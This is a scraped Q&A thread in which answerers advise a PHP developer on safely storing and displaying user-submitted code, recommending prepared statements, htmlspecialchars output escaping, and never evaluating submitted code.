Making users able to submit code what to replace in php?
Hi i'm planning to ma开发者_如何学Goke users able to submit some pieces of code (php,java,javascript c++, etc... whatever they want i mean).
so does anyone can suggest me the best practice to make it safety for my site? :))
i mean which tags/chars/strings to escape in php once is submitted code string?
If your intent is to display the code on screen, you do not need to escape or replace anything before storing it in your database (if you intend to store it) . This doesn't apply, of course, to escaping for database insertion via something like mysql_real_escape_string()
, for example (or your RDBMS' equivalent sanitization routine). That step is still absolutely necessary.
When displaying the code, just be sure that:
You DO NOT evaluate any submitted code via an
eval()
or system call.When displaying code back to the browser, escape it with
htmlspecialchars()
. Never display it unescaped, or you will introduce cross site scripting vulnerabilities.
Use placeholders in your queries and you don't even have to escape the input. Placeholders, binding, and prepared statements are definitely the preferred method.
It's faster for anything over 1 query as you can reuse the handles and just change the input.
It's safer. The string is not interpreted with the query... ever. What you store is what you get.
I'd need to know a bit more about your target sql to give pertinent examples, but here's some links:
PDO style binding: http://docs.php.net/pdo.prepared-statements
MySqli style binding: http://docs.php.net/manual/en/mysqli-stmt.bind-param.php
When you read it back, display with
htmlspecialchars($string, ENT_QUOTES);
ENT_QUOTES option ensures that both single and double quotes get escaped.
You don't need to escape anything (other then the usual mysql sanitation), if you don't intend to automatically run it.
I am no expert ( I only got told about this yesterday), but at least for HTML, you could try and use htmlentities (look at this ).
Once something has been converted using htmlentities, it becomes plain text, so if opened in a browser, you will see the tag and everything, (e.g. it will write <a href="blah blah">
), if it's written to a log or something else, and then opened in a text based editor, you will some symbols and shnaz that represent the html entities.
If you need to convert back, you can use the html_entity_decode function, I think, but I am going to wager a guess and presume that you don't need to convert back.
For other languages, I have no idea what you should do.
精彩评论